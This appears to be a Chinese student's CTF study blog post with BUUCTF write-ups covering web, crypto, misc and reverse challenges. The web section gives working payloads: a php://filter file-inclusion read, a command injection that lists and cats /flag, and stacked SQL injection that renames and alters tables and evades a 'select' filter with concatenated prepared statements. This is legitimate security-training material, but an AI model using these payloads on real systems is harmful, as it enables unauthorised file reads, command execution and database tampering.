BUUCTF-堆叠注入-文件包含

第五周学习-3.28

目录

Web

[ACTF2020 新生赛]Include

[ACTF2020 新生赛]Exec

[强网杯 2019]随便注

1.改名

2.预编译

Crypto

Url编码

看我回旋踢

Misc

你竟然赶我走

 大白

Reverse

reverse2

内涵的软件


Web

[ACTF2020 新生赛]Include

提示我们是include 文件包含

打开环境点击

 我们include 尝试直接访问根目录 失败

?file 是get形式

使用伪协议

?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解密

文件包含支持的伪协议_data伪协议_三月樱的博客-CSDN博客

[ACTF2020 新生赛]Exec

这题很简单就直接

127.0.0.1;ls
127.0.0.1;ls / 发现flag文件
127.0.0.1;cat /flag

[强网杯 2019]随便注

这道题已经困惑我很久了 一直遇到就退出 今天认真写一下

 GET

开始判断注入类型

 字符 我们先构造万能密码

我们猜测语句像这样

select * from x=''1'''

所以我们构造

select * from x=''1' or '1'='1''
1' or '1'='1

我们开始猜字段

1' order by 3#
1' order by 3--+ 
都可以

 2个字段

我们开始注入

 发现过滤

这就是今天学习到的 如果 select 过滤了 可以使用 堆叠注入

数据库

0'; show databases;#

 查看表

0'; show tables;#

 一个一个访问 这里又有一个注意的地方

表名为数字时,要用反引号包起来查询。

0';show columns from `1919810931114514`#

找到flag 但是无法查看 

我们接着查看另一个表

0';show columns from words#

发现里面有id 和data 两个字段

1.改名

words里面有id和data两个字段

 而在最开始的时候 输入1 返回的就是id 和data

所以我们进行改名

使用rename 将words改为其他的 然后把1919810931114514改为words 
然后在1919810931114514的表中加上 id这个列 把flag改为data
0';alter table words rename  to words1;alter table `1919810931114514` rename
to words;alter table words change flag id varchar(50);#

0';
alter table words rename to words1;   把words改为words1
alter table `1919810931114514` rename to words; 把1919810931114514改为words
alter tables words change flag id varchar(50);#
把flag改为id 然后改变为char类型 输出

然后使用万能密码输出

1' or 1=1#

 学会了过滤select后怎么办 还有改文件名的操作

2.预编译

题目过滤了select 我们使用预编译

我们想要执行

select * from `1919810931114514`;

预编译语法

set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句
-1;set @sql = concat('sel','ect * from`1919810931114514`;');prepare a from @sql;EXECUTE a;#


-1';
set @sql=concat('sel','ect * from `1919810931114514`;');
set设置@sql变量 和变量的值
prepare a from @sql;
将@sql 赋值给 a
execute a;#
执行a 

发先过滤了set和prepare 我们进行大小写即可

-1';Set @sql = concat('sel','ect * from`1919810931114514`;');Prepare a from @sql;EXECUTE a;#

 得到flag

Crypto

Url编码

 直接解码即可

看我回旋踢

下载后打开文件 发现是flag格式

想到凯撒密码

对照ascii发现偏移量为13

synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}

Misc

你竟然赶我走

 下载文件

CTF-Misc基础知识之图片及各种工具_ctf图片修复_Ke1R的博客-CSDN博客

打开Stegsolve.jar

放入图片

 选择这个 点击得到flag

 大白

下载文件 kali打开报错

是修改高度的错误

我们打开010

并且打开图片属性 查看分辨率为679x256

679为2A7

我们把高度修改为2A7即可

 

 flag出现

Reverse

reverse2

放入ida64

F5反编译

 和之前的差不多 变判断flag的内容

flag双击进去内容为

hacking_for_fun}

所以我们套上壳

flag{hacking_for_fun}

进行选择flag然后看看哪里更改了flag

 在这里发现了更改 我已经编译过了

只要选中数字 按r就可以改为这个 我们发现他把i和r都改为1

我们也更改即可

flag{hack1ng_fo1_fun}

内涵的软件

下载放入ida32 F5反编译

点击进入函数

 得到flag

更改为flag格式即可

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值